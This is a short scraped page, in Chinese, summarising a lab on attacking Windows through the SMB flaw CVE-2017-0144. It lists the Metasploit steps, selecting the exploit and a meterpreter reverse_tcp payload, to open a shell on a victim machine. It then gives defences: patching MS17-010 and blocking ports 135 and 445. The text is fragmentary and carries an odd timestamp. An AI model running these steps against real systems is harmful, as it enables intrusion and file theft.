Vulnerability-Research-CVE-2017-0144 — LAB: 基于SMB协议漏洞的Windows操作系统攻击 | Kitploit
ducanh2oo3/vulnerability-research-cve-2017-0144Vulnerability-Research-CVE-2017-0144
LAB: 基于SMB协议漏洞的Windows操作系统攻击
92年前
use 0 -> set payload windows/x64/meterpreter/reverse_tcp:运行exploit进行利用-在受害者机上打开shell(通过攻击机终端执行)成功入侵后:

=>至此,黑客已成功入侵受害者机。此时,黑客可以删除、窃取受害者文件而受害者毫不知情。甚至,黑客可以直接在受害者机上上传并运行病毒。V. 防御方法– 为避免被利用SMB协议漏洞,我们需要执行以下操作:激活防火墙(Firewall)。将Windows更新至最新版本。或下载并安装Microsoft的安全补丁。特别是ms17_010安全补丁。阻止135、445端口。+netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=135 name="Block_Cong_135"+netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 nam